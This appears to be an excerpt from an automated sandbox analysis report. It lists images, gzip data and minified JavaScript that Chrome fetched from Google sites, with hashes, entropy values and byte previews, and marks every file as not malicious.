                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d... .IDATx..y.dGu......:..F.iC.$.. ..H......>x...q..1&...61I..|..q...,...=,.-h4..m.2ZfF..,o.....{o..qoo......7..>...s.nU...:u..p..p..p..p.'.r.+p.O{[........!.....nQcL.f........:T........4..HU....}....;.....|.m...\...5......@2q.jC#7...?B9...WD..p......D.1.0..{...[........'..{...c...#..Z..7...C.. ..!U...{...uW\4...X...Z....'.i.....l.P(..\.n.....e..#...L. '|._^.......u.....eo.c...Z#.,w.+.Q...Z5t.r..j.$.u.......ke.w>v.r.....D.W...+.B......^.N.f.+`.}. &......e%........[.6....e.H.1&.....U.HlSQp..y.ay.6....]w.....v...n....#O.~...6..>..u9..1......ax...,..,../..+......(...q.t3n..`x....T.L..r)lM.........7.. ..\.Z.u..\u5.z-...'1.'..-.A.=z....&..OA.0.....}.!..!{6...=....F.l...../..Y.:Ns..|..,......s..NM..@z.aD.O....?.D...{..c.....>)..e....\.|.....~...0..wr..XX..-..~.5._.2z.`,.'.N...{h.............l......./w....ap...O..)..p.....oEg..?.<e{.r.v.X...O..<.l-.]w.~..!.&./;Ey...8M...5r[........6d.i......qr....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 670
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):413
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.50431141961128
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XExgpUIbIW3IvV+bEQ5Ron5685/hNTUuoX:XjbIW3Iv0TPon5685pe
                                                                                                                                                                                                                                                                                          MD5:F97808245ABF517E6F4ADF0889FF373F
                                                                                                                                                                                                                                                                                          SHA1:7684C9F19C481FD2C74CC9BCB774784C63A54FB6
                                                                                                                                                                                                                                                                                          SHA-256:1B7CDAD8F8AF0A483973D7754501C8892894E862542F0B55635EFA0257F32835
                                                                                                                                                                                                                                                                                          SHA-512:BBA0DD424EF9A079C69C412A27A43FCCC01C401D82375E2D1D5375F041CD2BA22DCAB38D97FAC6B0CAF9A5F21EE9AC3776D43FDBEA0CDC1CB88CF388EF642B05
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..........lRMo.0...WL..D.ml.......{.+.8`..F..l.}.W.E......z..5\....9M..9.N..._?......._z.T...I.+. U?..E2W.%./.Zc....D.y#.....5.!...i.SJ..H..E..r.jeN.#.,.bs.1....wi.k.u.x<.p. ..........>Z..m......4..Z6.sv..Z.....m.].=..>......TW.....j....'Y..F........9'.EG..Hc.n.k.m.]."O/!X....!^.!...g..5...-..Q........w{.5~...".............~...0ZeB..(i...y.!..r....A. Rl*....}...b.....T./..........t.....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (929)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1189
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.269841803151626
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:xlJaZDqE0TsXeHVQEurgpmlvr9sTL4KHSsRon0T:kO4O1UgOSTSsRk0T
                                                                                                                                                                                                                                                                                          MD5:63D8EF54E525B3D0F3F85C23080C3870
                                                                                                                                                                                                                                                                                          SHA1:BC656AF2A67F2DC2C4FCBF596FD6FA8C46092F69
                                                                                                                                                                                                                                                                                          SHA-256:2A0CF445FD832AC8E06C91D93F2F5A7F178A5A9F82D0B0BB427EA838D7016D46
                                                                                                                                                                                                                                                                                          SHA-512:70C26832BF17AF22107AC8440742BBAC6F9EB514D2F30FA0AB05FAD320CBE9ABAF492C3E0C47849D07BC96F060BE3193678AA918067F5BD397454563285D74F0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/BLvkbcMJ.min.js
                                                                                                                                                                                                                                                                                          Preview:import{r as a,s as p,x as b}from"./ycaG4YXp.min.js";import{e as c}from"./0XPwTFcg.min.js";import{n as v}from"./IYoTYjYE.min.js";import{e as d}from"./p9kcPq91.min.js";const f=".button{padding:0;cursor:pointer;background:none;border:none;font-family:inherit;display:flex;align-items:center;width:100%;gap:12px;color:currentColor}";var m=Object.defineProperty,g=Object.getOwnPropertyDescriptor,u=(r,t,s,n)=>{for(var e=n>1?void 0:n?g(t,s):t,i=r.length-1,l;i>=0;i--)(l=r[i])&&(e=(n?l(t,s,e):l(e))||e);return n&&e&&m(t,s,e),e};let o=class extends p{toggle(){const r=document.querySelector("[top-level-nav]"),t=document.querySelector(`#${this.target}`);t&&(t.hasAttribute("open")?t.removeAttribute("open"):t.setAttribute("open",""),t.ariaHidden=t.hasAttribute("open")?"false":"true",r.ariaHidden=t.hasAttribute("open")?"true":"false",t.hasAttribute("open")?r.setAttribute("hidden","true"):r.removeAttribute("hidden"))}render(){return b`. <button class="button" @click=${()=>this.toggle()}>. <slo
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x384, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):75403
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.983412784961348
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:u0atjKbuQTXTs5KppiRsh9eZyBH81LopJAy2aL+GlhlrWl/ZIojNOYTmIgVZ+ZCi:u0Ungg56wJOLx2ai0hlrWFZIsNzPQY
                                                                                                                                                                                                                                                                                          MD5:FB6BD2446FA4DC80CD5E8EEED326793B
                                                                                                                                                                                                                                                                                          SHA1:0D385B63CC3CAA56F11D689898DE7B8672146CD2
                                                                                                                                                                                                                                                                                          SHA-256:3657E5EB03A4AAB54F1617134E5974ADFB32E9422D064EBB6347287BCC4B59E6
                                                                                                                                                                                                                                                                                          SHA-512:62A739FC861F9A30817E50E5FC0074F0D796441B5039133D6AE26C909C2648D6D455C04287F8A7CCF06E76743F16B0E753F6FB0188B68CA10F024C1F2DDD8FA3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF.....................................................................................................................................................................................................H........................!.1A..."Qa2q...#...B...Rb..$3Cr....Scs...4..T.................................@......................!..1A.Qa."q...2.....B..#R.3br..$.4...c..............?...".....x..:..I&.I#&.j..c.R.q.t$..#.pI!.............mO..l....{...-.8~s%*E.....1....dI.....VE...24...KD..H..$...........\....e....a.p..G:.*...\x.O...B.p..Z....=.}..n&./..[.Yo.e....O-.>53er.I!..8..c..........f.(..d....C.>.f......R.@...4y..~.v......n...F.>id.Xe....n4...-..i.............f.4...v.......i.x.E.<P.F*].7h...5..U.$X...?0.......Aq..2..BL.k.)......!`..)..I$.(.....(.A...W..,|;Q.A.~...(.....~...f.v!.........^.....W:0..).9.?...:..|H*0.G.P:.F..#.<C.*.H..../.o_ax..%.9u*...R.s.:...;g..C.-...}W...X..#...L..Z%.~G..O ..y2.v.u..^..*O.Vf.>W.'ez....Z#.I'....F........($.,.v...H.N..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3371
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.886614052822181
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:a2kvgA2m5ed9WT7AZWuiOh9wZu+BbP+/0b+EWoAQc0Ke7/:cimhAYuiEngznnJ/
                                                                                                                                                                                                                                                                                          MD5:FCC6A5A590F8A56FE298D45CFC875ED5
                                                                                                                                                                                                                                                                                          SHA1:B1CE3FE1F22648F519C54127FA472A1F1FE6D08C
                                                                                                                                                                                                                                                                                          SHA-256:477BA241EC4BD3F78A83B8045AC219E9B304075D26A739C41B62F5E429136503
                                                                                                                                                                                                                                                                                          SHA-512:C697AEE0299352FAC08926EE83BFCB4DED2AF5FA976919454996A8E985D5C30DB369EAE67EB8542AA77F2D25DC3DAC88C0361387A197FCF49AF2FFDBFBF580F2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/i7W2EWxINNLwgzMNOveR5SNQHKisftbymepppsfQEA1whmCJV0H0cauacdN-I0RfEc7Kz6PJsLAlw6zR97E1rpdxVRSGP_Y2UtFOGlQ=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..{..U..?.....3.d&..!..[K..(......u....,-w4..V.(f.....H.H.&.nF..H.P....e.`+..IH...y...g....}.1L.s....C.*.jR......._..............................=..n>z.n....-.^X.s...C.<.Hv..W..S/...[.....4.V../._...n....n.ab..l..B.1L........T.S...}|....e...`.v>..............k^.`...I....d.............1SG.Mm7......sG.7l&U.[.3....&.{|.U)N+..^.._.].77D.ugRd.e;...`%p..>7v....0...Mm.v.u..^)n(..H.g.e;)...=...SB.....#......4..B.N..`.v.._.......-..U)..37......W..k.e;.....`..n.0.-..%...7/Y{..`...4..K...W.!]F...n9............SN.4....|......W..\.../o...W...i.^.e;..f....Zb...}B.b...dS.[/?....R.EC.i...!..K..%yb..1.(J".....\..u..!.._.-.Y....VH.m.Rn.-./.z.....K....i.-.Y.l......R\......v|Q.....K.e;&p.p-.fm...1b........+7.M*......l..[.........U.T..M.s....:...|.D..m......`n.T....._x..."..G"..).O.....3..P.#.|.Le...6.....M.....lg..,..B4.....s.........,.~.l...l..;.;.5:u....2......;/Z.|`. ...`.v........aS..^Q..mY..?Ml.s..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 384 x 384, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4463
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.504816863583782
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:oFohgV/tAnZIp2dXhSD1GfXTTW6is29ul08ixYCdN+45K40f15:oFoh+anqp250DofR2gl05YCdj5Xk5
                                                                                                                                                                                                                                                                                          MD5:32B950D96A70990F4875792FA123D4B1
                                                                                                                                                                                                                                                                                          SHA1:1ADBA6313FF312C2D529497D52908A14132243C6
                                                                                                                                                                                                                                                                                          SHA-256:2C6878E013D4BD6970C0B5056E192207A63C1FB3BDBD80B0122BE6ADA4B42CA7
                                                                                                                                                                                                                                                                                          SHA-512:089B9176D0ECF7C9CDEF9A72077A73516187DB556C51B4A02353633614EFEBAD6B2A85E2FE2E38FE171926798773A6AEF1289D4DA380A52E2C30AF38153594D1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/gmail/about/static-2.0/images/logo-gmail.png?fingerprint=c2eaf4aae389c3f885e97081bb197b97
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR....................pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx...M.$.Y..zz6Q.......M@...R,....A.mq..ls......8p......H.6...c.EH........"G...9..3.E.x...g........V..v=......]!..................................................................................t......Y.Z8_..#...)....h{2.<...v....O._.....A.+<(~.wfy.f.............S..}6.....I...C..g..,....g.A...%;...~.O......0 .....n2.*d..y....e..._.oe..[..o?..@...~..&.!.;...8......1{=.\\..X/...C....M..,.}.6y.....0j...l.T.&.....r<....^.=..P......B.l.+.e....{..'7......?.O.........|)..A.e/M'G/.i+...X.._u0)&...........:..._;...........;.....d+..A......~+..T6.......j.B....x.....Z..............=V|.v...,..!...W....{}....n..n.Yh-..Z.@q.o../Q....9.`.].....{......k}.._...66f.....$t.{..zjs....._.:W....._....$.W6.Ng...r.....u4..>ze...N7......{=..$..3... Y.......1...HB..CK>.....$..../IB..CL>.................W..FJ...&....jOO.;l......}&....IB..%.....r.7.[......G.z.A....2.,v~2..u..A........
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):7323
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.958638329717196
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:JVK2xmb2EVQeqJTDASVn2uXYrB19n+1zuynMUQ1fG:JEOm/VQeqJP952sYrB19YzuyMUQ1fG
                                                                                                                                                                                                                                                                                          MD5:C8DBE0DD84A45F5E2A6BC9C9928C8492
                                                                                                                                                                                                                                                                                          SHA1:E388FF567548224DAF566CF37A6C7AB8FF08069C
                                                                                                                                                                                                                                                                                          SHA-256:07379D53AFD4C8E0BAA7AA200059E30F9DE4F659552C1F8C50570F8F16B583C2
                                                                                                                                                                                                                                                                                          SHA-512:6C1AE903673C9D9EC3A703238355AD8FB195071A067F0939ECF4DD4CD1530540AA7A84F36598661643A5251F5FE8B488CDAEB1581BBCFB20B3A790F87A09C5C9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....RIDATx..{...}.?.....=...R$..... .."E34I..T%:Q.T.UL\!..*r$U........*.a*,...K..(.K........|..(....x.......93..co...3..w{{...............Wq.Wq.Wq.W....].[..s.M.m\..v.Rh..(4*..Z...5hEW.t...+./mOi..<Uw....s.g.}...........d.....g.;..V..N.L.^..n.F..ZG..Sf.G.......v...J.. .:r....sR.?`......4..m_o ..M9U.4N......E.......P.qDF.%"....,)(...i..O.}t.?.{.Wb^Y1....>%o....X....J.].....dF!m...[....\........m.f.}.JL.+.......o...o-..UQ....K.&].X..>.J...q!0...q.w..iL.+.9..>...1...W*...iW.H..."..H..5.m~m.@j._.C.....A..~.*.P.....g?..0..*.M!oUZ'..V.^..@:...Y.P.V.Y..Rt..0>..."...,......\.......2....\..$-|;.}g...}....x.`..,P...(.. .J..R.>zf..x..........\..Z....?>>.Zc.........{2.[...5.cY..r&Zk.%..-.5.5=r15...{......K!7.....5......k...iM..X..0R.'.w....0..Y.)."..T4...g...J$`.........KJ.o'rLfLD.K...M.<.e..Y<.35..B......... ...g...dq.a.6..........._.....~.yF.g....,lq.]).T...o.i #....<...[.......&...|.5...aC.$.8.B....?..b
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3209
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8921258196992765
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:5RB7iIwmQKoPlz0e1Kn01drNGWMnkDWPGn5TTIQ2:PB7iIwxK+rKkBWaTIF
                                                                                                                                                                                                                                                                                          MD5:5E3221E1632DB15264647B64C5839670
                                                                                                                                                                                                                                                                                          SHA1:7999686FCC63A1545DF4CAC5E7B310069F5BC12F
                                                                                                                                                                                                                                                                                          SHA-256:87AE827869717F280B3C24642C68AC1C2E66A3821D6D2AD7CC467DA8D2A3CACC
                                                                                                                                                                                                                                                                                          SHA-512:10DE0C952BF5404939AB8594116338FDCDABCD5B4BAB0394C5E3FDD2E015E6CA25DB1B6CB3AF4191159EE716CA8236F7D915AEFE2C79B11F43720782A518A479
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/sfQ-WzgiZ1asQ0K88_k8UG53n8u4ERdLJsZI-lTyHmL_p2f4ViSo6g10vYrjn34HR6sfjZGvs6xpRncjw4PT9u9iD8tC4CTDBIT4sD4=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....@IDATx..yl.....MN.A.p.S!...8... T.B[...x.d..(.hI9...E...J..R.. J.....8).SDQ.........g}...#....z.u..}..&~.....~....{.yo....h4..F..h4..F..h4..F#.....@..$.l....$..L....[&..x.+...'o.XX.!......o.l.....Ck..&...c..8.B3..../%m.5......t....Ip....y..I.%.I*...e5 d5@n.0..!..}.'Z.....P/..J..4.k..~..n.$.RP..f....K.rG.v_T....c...........7.......X.(#....L4.\E...O..M.J.q....#]`....@....X..nC@.b.1......X..1......=e:V.W.a......}Ib.Y!...4..8..H..g.F#rX\D.M....,M`..W.{...[...,d.0l.9...)E`......a..B.9.9....t...'+._..'/r..u..|...T.....9.}..Ih.1..L..W.x...... .....D.s..^....c.2...1...<Im9..W.].1....ZH`..%.!.PXxE.E..a...d...v).(...*28.%._J........lH9d.^$.._U..c=(.).....d6$ .....^..../...#G.9..c.....h..\'w..{=........3K...l.....(h.....S.a.....i..1.P.O.?A.Q......R%..e.RxQJ@)r_F..@zh.m...^.Nl..}....q.t./.r.....R].Rd...s1....}pd.;.~..;.../....f...YS?..$.I.D.".x.t..."$......-.wchx..*.y~..e8.Sf....9.;....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (520)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1621
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.133062707136759
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:BWtHJL4xqZM7aHwh7BrUPVgrhNVbVPO3A66AWKd4YRPdN2xy6Q1NyDoto:BuGp7awh7S9gJhx3afVks6CgD
                                                                                                                                                                                                                                                                                          MD5:E53921C9E7B68E2A9574BEDE4FE9DF64
                                                                                                                                                                                                                                                                                          SHA1:EE4D5BA53B17AB6F31D0DA4F24FF43EBBB91A28A
                                                                                                                                                                                                                                                                                          SHA-256:B2F71BA0BD7AC60955BC1EE1F0F57C55E402BB1088738890672D572749065070
                                                                                                                                                                                                                                                                                          SHA-512:212A553664BABA47F4C2B72BCEA07154BA29859A5280B17367EB69988BA89E358C4DF4565220A80E9AA5549EE7138F664C165FDA02327A6F29D3F8AF1B3773F5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.google.com/xjs/_/js/k=xjs.s.en_US.u9kBZBte-Es.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAACBAIEAAAAAABQAAAAAAAAAAAAAAAAAAAAAIBAAgJAQAAACAABwAAAAICAAABAAAAERAAAEiAAAAAgAAAAAAAAAAIgAYAIAAAAAAC4AABAoAgAAEAAAgAEAAIAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAACCEA_AAAAAAAAAAAAAAgAAAAAAAYAAAAAAAAAAIAAAAAQIADAABmAAAAAAAAAAO4DgOABgCGFBQAAAAAAAAAAAAAAAIAEwViQgIIAAAAAAAAAAAAAAAAAAAAAKUETBwg/d=0/dg=0/br=1/rs=ACT90oGlQ_qSjncWQjAN6Nnblp3ZMWaSlA/m=sygt,sygu,aLUfP?xjs=s4"
                                                                                                                                                                                                                                                                                          Preview:this._s=this._s||{};(function(_){var window=this;.try{._.Qub=function(a){this.Ul=a};.}catch(e){_._DumpException(e)}.try{.var Rub=function(a){_.On.call(this,a.Ka);var b=this;this.window=a.service.window.get();this.Ba=this.Ul();this.Aa=window.orientation;this.oa=function(){var c=b.Ul(),d=b.SXb()&&Math.abs(window.orientation)===90&&b.Aa===-1*window.orientation;b.Aa=window.orientation;if(c!==b.Ba||d){b.Ba=c;d=_.n(b.Me);for(var e=d.next();!e.done;e=d.next()){e=e.value;var f=new _.Qub(c);try{e(f)}catch(g){_.da(g)}}}};this.Me=new Set;this.window.addEventListener("resize",this.oa);this.SXb()&&this.window.addEventListener("orientationchange",.this.oa)};_.F(Rub,_.On);Rub.Ha=function(){return{service:{window:_.Pn}}};Rub.prototype.addListener=function(a){this.Me.add(a)};Rub.prototype.removeListener=function(a){this.Me.delete(a)};Rub.prototype.Ul=function(){if(Sub()){var a=_.Cl(this.window);a=new _.tl(a.width,Math.round(a.width*this.window.innerHeight/this.window.innerWidth))}else a=this.yc()||(_.k
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2290
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8904718577516855
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:wryYbkyGVdlNbZaOrs8fWuwkU1pbUm13sTEc7hEOFxRKsm/15:EyYb2FNYwsFH1pbDBsQaEyW
                                                                                                                                                                                                                                                                                          MD5:6CD91ABF26A1821C13028A09DDE8A734
                                                                                                                                                                                                                                                                                          SHA1:E793230176267FE9A91931107AABA9C93502CD9D
                                                                                                                                                                                                                                                                                          SHA-256:63A4D6D1727DCE2864794B52F86DCE4ECAC11F5AD49249C4FC0BDDCF67A11304
                                                                                                                                                                                                                                                                                          SHA-512:C4133E6A2AE3ECDC26121E9E991C736594057A7C71761964EC2D16617CE1AD23C4CB1021BA9AF4FBF09F6B636ED833179F8B164B714D50B7FBFAB1B7D795F3AE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/82/0b/9cecb82646bba6e012c3d61e60a1/image-282.webp
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8X..............ALPH......m.!I'UF.m.m.....m..]vU.}...qv....@?....M.b..e..Q..y.....?Q.}.....)../l..5+..v0WYz....Z.r.....a...kx&.............}e..Y..F...5xj.fA.\..D..g..~~..V.(....r^..\WP....Ea9#....R2.@..Z.H..:..:.`.."#.{\..eT....Q+...(.6.A.......S....%.q......WTI....c...Q...$..0..9.P.$P.In.XD.*. ..ax...!..F..... ...w..?=,....e)w.k^c.\.+..&......8.y.t.Sb].n\...x...*...WE......W.Y.7.......>F..W8....8.......u..]ly2.Y.w...g..M.@2uV.7)K.h.oE....d.s\...Y......]..l.......;..VP8 .....&...*....>m0.F.#"!*R....h..@.......?..........J;......Z..........`....H..~...{......)......P.....W...........^...8....S.%x.....hA.,.o.........q...X...wS....}..u.[...C.....q.).uy.Z...P8.............v...;....Z.[...Ce.....U...K?.c.p=.T#}.4......l....?.B...`.*...."..... ;.).a...\...66....>w.a.X...-.....J......FE.i.f.....by+5AT.>..r.t1.?...##..'.....WP.A.j]CR......+..=}.{.....f.B...EQ...+v.Fe..(...{......y..Wa.....v.....$...c...lA+....-.v..Bq.&.E...P
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):123324
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.992727178191579
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:3072:oU0uqzm8FxKGjoY17UbkDrtFIlcWFQSMnQjBU9sWfSkyiK:ozuLaKGjN1wbkENjBUTfZY
                                                                                                                                                                                                                                                                                          MD5:D820818965598B4239C3F543FDD7EDA8
                                                                                                                                                                                                                                                                                          SHA1:7F376CDAEF20F173A8BB431B0F099C5DC19AA94E
                                                                                                                                                                                                                                                                                          SHA-256:A36E8FB28E44F896B22A16728A1D63ED731052AD2641CC2FD86F5C2C2FBF8BD0
                                                                                                                                                                                                                                                                                          SHA-512:7AF541F3E7A7C5810F74EA1752B0E3BCB31F735941BA9E9D18B33ECB11E6CF6391BFBF1B9E564E22754F2D88D647A8F6F210802819BC9DBB0F5D07932DE9BFA8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..9.MP..6l#. .L`..........r....{-....:'..F.......4U.S.M{.#In...,.o...Z%...j.h....X.....a..................>.H[....=.Z.@I.X. .....).$..Z...!....$hk.l.\.'%.=...3..7...+M....$].`2...)Mr...v.~..%o.......v"Z..i2.j..i....I......<.k..-.\.~'l13..V..kJ..9R....7K..9GJ.&.M..(o>/z...K.."..+.......~../^g.b....!.q....+.{H..0'.%..Y.."=...J...Mj+M.$....:?.Z.&3/.n....<Jd..:?.Z..+I^...7..e.!..ZKR.I.-<-.I..d%k..~.v2.i....H.".._@.....?=....$.Z...@B....u.L..A".9..............mc.%...%..~p..;..I~_...j.[L0T..~Z...`.KkM..[_.v..+.......r...WWb{.9...E.j.~.........L.......{o. ..0X3.;.+.?....L..vZ.&i.k.RH!.V..}?^.......JY..Va..Gc..l.m...j....vqi.....{.z..n.....mS.m..'.D...5..w.Q.r.J.Z...S9..O.....c.X=..5_7../..^ZJ.M...=....?....u.}...Z.6}..|.=..Og.7wM........$. L..(.#..0.x...s......x..O..qu<.....^.ki..*+..:>4K.\*...#.A.h.v.....$.*.,.../.[n[.L...sgw(.../.<>'&K.P..1.........1..Q.#.;..n........|...."......uw......>..>?....P..TT.c.G.G&iMgH...v]
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (589)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):383834
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.26257280052659
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:on+Si589iTKNYPitRo6IWJxFjYV9i1esjYE3bjHQoeRjVFmBFLKs:2WEJw7FLs
                                                                                                                                                                                                                                                                                          MD5:0C8FE2DFB7F074506C9A1114FAA763D7
                                                                                                                                                                                                                                                                                          SHA1:6D1B29C97D4E144E03F83284B7001C92A6523F78
                                                                                                                                                                                                                                                                                          SHA-256:0AAF712AB739F0A7BCE8FB2BEF58D609B7EACEBC514F35B61C2BEC77CC102A44
                                                                                                                                                                                                                                                                                          SHA-512:EA0D3E4381799B4FE4E5AF17FB30EEDA7B9380247CA5EF7B3216287814435E3ECFD2D3D9468CDFBDADDCC16F884BF2CA2B57077B332AC1A0EDADDF3E114E45AA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/glue/v26_0/material-components-web.min.js
                                                                                                                                                                                                                                                                                          Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):"object"==typeof exports?exports.mdc=e():t.mdc=e()}(this,function(){return i={},r.m=n=[function(t,e,n){Object.defineProperty(e,"__esModule",{value:!0});var i=(Object.defineProperty(r,"cssClasses",{get:function(){return{}},enumerable:!0,configurable:!0}),Object.defineProperty(r,"strings",{get:function(){return{}},enumerable:!0,configurable:!0}),Object.defineProperty(r,."numbers",{get:function(){return{}},enumerable:!0,configurable:!0}),Object.defineProperty(r,"defaultAdapter",{get:function(){return{}},enumerable:!0,configurable:!0}),r.prototype.init=function(){},r.prototype.destroy=function(){},r);function r(t){void 0===t&&(t={}),this.adapter=t}e.MDCFoundation=i,e.default=i},function(t,e,n){var i=this&&this.__read||function(t,e){var n="function"==typeof Symbol&&t[Symbol.iterator];if(!n)return t;var i,r,o=n.call(t),s=[];try{for(;(void 0===e||0<e--)&&!(i=o
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (685)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):898
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.293332504092247
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:XM+CVloofDDcfcE7VpuuAvauaj9PcU+W1YPcU+7ahU+x5R4gfHCcc3oZhS7KpvM+:8plJfDDcUE7Vpuha0wd9b+tzCcFsrm
                                                                                                                                                                                                                                                                                          MD5:2C32D27858C759A0D060AC348AE733A3
                                                                                                                                                                                                                                                                                          SHA1:6DF1F412D85F6B2B702BF062922A25AE3E02584E
                                                                                                                                                                                                                                                                                          SHA-256:E69D8D253D51A496E82B50254BC27589826C0E1A838E8BCE6BA328A91BB5C206
                                                                                                                                                                                                                                                                                          SHA-512:D71C3C8E50AC3417B3E8FDCB292A48263B56A18CC24AE9917F34433142386C3F009A4AC90A8C4B0D9C3564AC03D9F9F0375538D4AD0CAA2EB953C2DEC518E13D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/44SUZn7a.min.js
